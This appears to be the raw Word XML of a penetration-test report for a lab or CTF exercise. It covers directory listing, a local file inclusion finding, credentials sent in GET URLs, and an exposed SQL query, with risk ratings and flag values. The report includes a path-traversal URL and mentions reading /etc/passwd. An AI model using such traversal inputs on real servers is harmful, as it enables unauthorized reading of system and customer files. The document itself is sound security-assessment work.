    <w:p w14:paraId="76D8B4C6" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729BFA66" w14:textId="63CF5692" w:rsidR="00220DD3" w:rsidRDefault="2E62A322" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Directory Listing of the /data/ directory was found on both the production</w:t>
      </w:r>
      <w:r w:rsidR="4987A8B4">
        <w:t xml:space="preserve"> (port 80)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the staging server</w:t>
      </w:r>
      <w:r w:rsidR="67E5DE70">
        <w:t xml:space="preserve"> (port 8001)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The production server had a few more files than that of the staging server. The only file that needed elevated permissions to be accessed was flag4.jpg. All other files were able to be retrieved. Some of the sensitive company and user information that could </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>be accessed was the customer.list and flag1 files. The value of flag1 is</w:t>
      </w:r>
      <w:r w:rsidR="375C49CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="67B68BFF" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lag1{cyberfellows_goodluck}</w:t>
      </w:r>
      <w:r w:rsidR="47BC2E43" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E21F9A" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04E4518A" wp14:editId="36838D78">
            <wp:extent cx="3462802" cy="3062908"/>
            <wp:effectExtent l="38100" t="38100" r="42545" b="42545"/>
            <wp:docPr id="3"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screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3470355" cy="3069589"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="28575">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E33D39" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Figure 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>: Directory Listing of the Production server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28711D8F" w14:textId="3420371E" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="00F12F69">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62FEDCE4" w14:textId="6F19884F" w:rsidR="00220DD3" w:rsidRDefault="00F52E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00B41A85">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Local File Inclusion</w:t>
      </w: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220DD3" w14:paraId="7D4B16ED" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="236"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9359" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="A61C00"/>
          </w:tcPr>
          <w:p w14:paraId="666CF6F6" w14:textId="7B462FB8" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH RISK (</w:t>
            </w:r>
            <w:r w:rsidR="000A151E">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="33C3222C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3014" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
          </w:tcPr>
          <w:p w14:paraId="44BB80F4" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Exploitation Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="684ED80C" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="3F6A4558" w14:textId="77777777">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002B558" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Business Impact</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62F3D61F" w14:textId="03DB14F3" w:rsidR="00220DD3" w:rsidRDefault="00E56270">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="1235337E" w14:textId="77777777">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AF311E4" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Difficulty</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0A023844" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E051163" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3"/>
    <w:p w14:paraId="17C42272" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A36D2" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:r>
        <w:t xml:space="preserve">Local file inclusion was found on both the production and staging server. The URL for the production server is: </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.0.66/internal/customers.php?list=</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>..%2Fdata%2Fcustomer.list</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. By changing the highlighted part of the URL, an attacker can read sensitive data on the NBN web server. Flag2 was found to be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag2{down_a_rabbithole}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C5F41A" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="467DA0EA" wp14:editId="0A82F8CE">
            <wp:extent cx="4224130" cy="3106192"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="7"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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4226170" cy="3107692"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3D1670" w14:textId="089AA743" w:rsidR="00220DD3" w:rsidRDefault="2E62A322" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 7</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: Reading the /etc/passwd file through LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F72EC5E" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E2925D" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F2D78E" w14:textId="59CDC6A1" w:rsidR="003C1B9C" w:rsidRDefault="00B94233" w:rsidP="003C1B9C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="003C1B9C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="003C1B9C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Information Disclosure</w:t>
      </w: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3C1B9C" w14:paraId="70B2348F" w14:textId="77777777" w:rsidTr="00E56270">
        <w:trPr>
          <w:trHeight w:val="236"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9359" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="4C443BAD" w14:textId="5D6BC740" w:rsidR="003C1B9C" w:rsidRPr="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
            <w:r w:rsidR="003C1B9C" w:rsidRPr="00E56270">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> RISK (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="003C1B9C" w:rsidRPr="00E56270">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C1B9C" w14:paraId="1233F4F2" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3014" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
          </w:tcPr>
          <w:p w14:paraId="7F97548C" w14:textId="77777777" w:rsidR="003C1B9C" w:rsidRDefault="003C1B9C" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Exploitation Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B936FC6" w14:textId="776108C2" w:rsidR="003C1B9C" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C1B9C" w14:paraId="5F4595BA" w14:textId="77777777" w:rsidTr="003B2C88">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E489EAF" w14:textId="77777777" w:rsidR="003C1B9C" w:rsidRDefault="003C1B9C" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Business Impact</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72FC974F" w14:textId="24DEB906" w:rsidR="003C1B9C" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C1B9C" w14:paraId="311BCAC3" w14:textId="77777777" w:rsidTr="003B2C88">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0B8DED4B" w14:textId="77777777" w:rsidR="003C1B9C" w:rsidRDefault="003C1B9C" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Difficulty</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5ED51F3A" w14:textId="77777777" w:rsidR="003C1B9C" w:rsidRDefault="003C1B9C" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="123E7AC0" w14:textId="77777777" w:rsidR="003C1B9C" w:rsidRDefault="003C1B9C" w:rsidP="003C1B9C"/>
    <w:p w14:paraId="01F7DE69" w14:textId="77777777" w:rsidR="003C1B9C" w:rsidRDefault="003C1B9C" w:rsidP="003C1B9C">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C20A3" w14:textId="6D852843" w:rsidR="003C1B9C" w:rsidRDefault="003C1B9C" w:rsidP="003C1B9C">
      <w:r>
        <w:t>When submitting the username and password, the credentials are transmitted with GET requests. This means that the input will be shown in plain text in the URL. If the attacker is performing a man-in-the-middle attack, they will be able so the submitted credentials via the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D15C6D1" w14:textId="2951D197" w:rsidR="00220DD3" w:rsidRDefault="00071B65">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071B65">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42E24B4C" wp14:editId="3831E427">
            <wp:extent cx="5943600" cy="1034498"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13335"/>
            <wp:docPr id="140007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7734" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId34"/>
                    <a:srcRect b="53875"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="10344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F6056B" w14:textId="1D0B7669" w:rsidR="00071B65" w:rsidRDefault="00071B65" w:rsidP="00071B65">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 7</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Sensitive Login information shown in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E3271" w14:textId="77777777" w:rsidR="00F12F69" w:rsidRDefault="00F12F69">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69072903" w14:textId="069B7E3E" w:rsidR="00071B65" w:rsidRDefault="00B94233" w:rsidP="00071B65">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00071B65">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00071B65">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Shown SQL Query</w:t>
      </w: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071B65" w14:paraId="40AF97EF" w14:textId="77777777" w:rsidTr="00E56270">
        <w:trPr>
          <w:trHeight w:val="236"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9359" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="52BD3BE5" w14:textId="19A61C3B" w:rsidR="00071B65" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
            <w:r w:rsidRPr="00E56270">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> RISK (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidRPr="00E56270">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00071B65" w14:paraId="4230B814" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3014" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
          </w:tcPr>
          <w:p w14:paraId="2B647A33" w14:textId="77777777" w:rsidR="00071B65" w:rsidRDefault="00071B65" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Exploitation Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48B0D037" w14:textId="7FF365A9" w:rsidR="00071B65" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00071B65" w14:paraId="1A028EB4" w14:textId="77777777" w:rsidTr="003B2C88">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212B8E5" w14:textId="77777777" w:rsidR="00071B65" w:rsidRDefault="00071B65" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Business Impact</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034C1D09" w14:textId="16DCD836" w:rsidR="00071B65" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Minor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00071B65" w14:paraId="0B1165B9" w14:textId="77777777" w:rsidTr="003B2C88">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F295E37" w14:textId="77777777" w:rsidR="00071B65" w:rsidRDefault="00071B65" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Difficulty</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2110581F" w14:textId="77777777" w:rsidR="00071B65" w:rsidRDefault="00071B65" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
